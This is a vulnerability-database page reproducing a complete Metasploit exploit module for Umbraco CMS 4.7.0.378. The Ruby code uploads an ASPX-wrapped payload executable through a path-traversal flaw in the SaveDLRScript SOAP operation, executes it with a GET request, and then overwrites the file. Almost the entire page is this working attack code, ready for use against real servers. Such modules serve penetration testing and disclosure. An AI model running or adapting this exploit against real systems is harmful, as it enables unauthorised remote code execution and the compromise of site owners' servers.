Lucene search
K

Umbraco CMS Remote Command Execution

🗓️ 06 Jul 2012 09:52:43Reported by Toby Clarke, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 48 Views

Umbraco CMS Remote Command Execution in 4.7.0.37

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize
    super(
      'Name'          => 'Umbraco CMS Remote Command Execution',
      'Description'   => %q{
          This module can be used to execute a payload on Umbraco CMS 4.7.0.378.
        The payload is uploaded as an ASPX script by sending a specially crafted
        SOAP request to codeEditorSave.asmx, which permits unauthorized file upload
        via the SaveDLRScript operation. SaveDLRScript is also subject to a path
        traversal vulnerability, allowing code to be placed into the web-accessible
        /umbraco/ directory.

        The module writes, executes and then overwrites an ASPX script; note that
        though the script content is removed, the file remains on the target. Automatic
        cleanup of the file is intended if a meterpreter payload is used.

        This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows
        7 32-bit SP1. In this scenario, the "IIS APPPOOL\ASP.NET v4.0" user must have
        write permissions on the Windows Temp folder.
      },
      'Author'      => [
        'Toby Clarke', # Vulnerability discovery and Metasploit module
        'juan vazquez' # Improved version of the Metasploit module
      ],
      'Platform'    => 'win',
      'References'  =>
        [
          [ 'OSVDB', '83765' ],
          [ 'EDB', '19671' ],
          [ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ],
          [ 'URL', 'http://umbraco.codeplex.com/workitem/18192' ] # Item deleted for security reasons
        ],
      'Targets'     =>
        [
          [ 'Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1', { } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Jun 28 2012'
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of the Umbraco login page', '/umbraco/'])
      ])

    self.needs_cleanup = true
  end

  #
  # Remove the asmx if we get a meterpreter.
  #
  def on_new_session(cli)
    if cli.type != 'meterpreter'
      print_error("Meterpreter not used. Please manually remove #{@upload_random + '.aspx'}")
      return
    end

    cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

    begin
      aspx = @upload_random + '.aspx'

      print_status("Searching: #{aspx}")
      files = cli.fs.file.search("\\", aspx)
      if not files or files.empty?
        print_error("Unable to find #{aspx}. Please manually remove it.")
        return
      end

      files.each { |f|
        print_warning("Deleting: #{f['path'] + "\\" + f['name']}")
        cli.fs.file.rm(f['path'] + "\\" + f['name'])
      }
      print_good("#{aspx} deleted")
    rescue ::Exception => e
      print_error("Unable to delete #{aspx}: #{e.message}")
    end
  end

  # Module based heavily upon Juan Vazquez's 'landesk_thinkmanagement_upload_asp.rb'
  def exploit
    # Generate the ASPX containing the EXE containing the payload
    exe = generate_payload_exe
    aspx = Msf::Util::EXE.to_exe_aspx(exe)

    # htmlentities like encoding
    aspx = aspx.gsub("&", "&amp;").gsub("\"", "&quot;").gsub("'", "&#039;").gsub("<", "&lt;").gsub(">", "&gt;")

    uri_path = target_uri.path
    uri_path.path << "/" if uri_path[-1, 1] != "/"

    @upload_random = rand_text_alpha(rand(6) + 6)

    soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SaveDLRScript xmlns="http://tempuri.org/">
      <fileName>/..\\..\\..\\umbraco\\#{@upload_random}.aspx</fileName>
      <oldName>string</oldName>
      <fileContents>#{aspx}</fileContents>
      <ignoreDebugging>1</ignoreDebugging>
    </SaveDLRScript>
  </soap:Body>
</soap:Envelope>
    eos

    #
    # UPLOAD
    #

    attack_url = uri_path + "webservices/codeEditorSave.asmx"
    print_status("Uploading #{aspx.length} bytes through #{attack_url}...")
    print_status("Uploading to #{uri_path}#{@upload_random}.aspx")

    res = send_request_cgi({
      'uri'          => attack_url,
      'method'       => 'POST',
      'ctype'        => 'text/xml; charset=utf-8',
      'headers'	=> {
          'SOAPAction'     => "\"http://tempuri.org/SaveDLRScript\"",
        },
      'data'         => soap,
    }, 20)

    if (! res)
      print_status("Timeout: Trying to execute the payload anyway")
    elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/)
      print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
    else
      print_status("Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway")
    end

    #
    # EXECUTE
    #

    upload_path = uri_path + "#{@upload_random}.aspx"
    print_status("Executing #{upload_path}...")

    res = send_request_cgi({
      'uri'          =>  upload_path,
      'method'       => 'GET'
    }, 20)

    if (! res)
      print_error("Execution failed on #{upload_path} [No Response]")
      return
    end

    if (res.code < 200 or res.code > 302)
      print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]")
      return
    end

    #
    # 'DELETE' - note that the file will remain on the system, but the content will be wiped.
    #

    soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SaveDLRScript xmlns="http://tempuri.org/">
      <fileName>/..\\..\\..\\umbraco\\#{@upload_random}.aspx</fileName>
      <oldName>string</oldName>
      <fileContents></fileContents>
      <ignoreDebugging>1</ignoreDebugging>
    </SaveDLRScript>
  </soap:Body>
</soap:Envelope>
    eos

    attack_url = uri_path + "webservices/codeEditorSave.asmx"
    print_status("Writing #{aspx.length} bytes through #{attack_url}...")
    print_status("Wrting over #{uri_path}#{@upload_random}.aspx")

    res = send_request_cgi({
      'uri'          => attack_url,
      'method'       => 'POST',
      'ctype'        => 'text/xml; charset=utf-8',
      'headers'	=> {
          'SOAPAction'     => "\"http://tempuri.org/SaveDLRScript\"",
        },
      'data'         => soap,
    }, 20)

    if (! res)
      print_error("Deletion failed at #{attack_url} [No Response]")
      return
    elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/)
      print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
    else
      print_status("Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]")
    end
    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation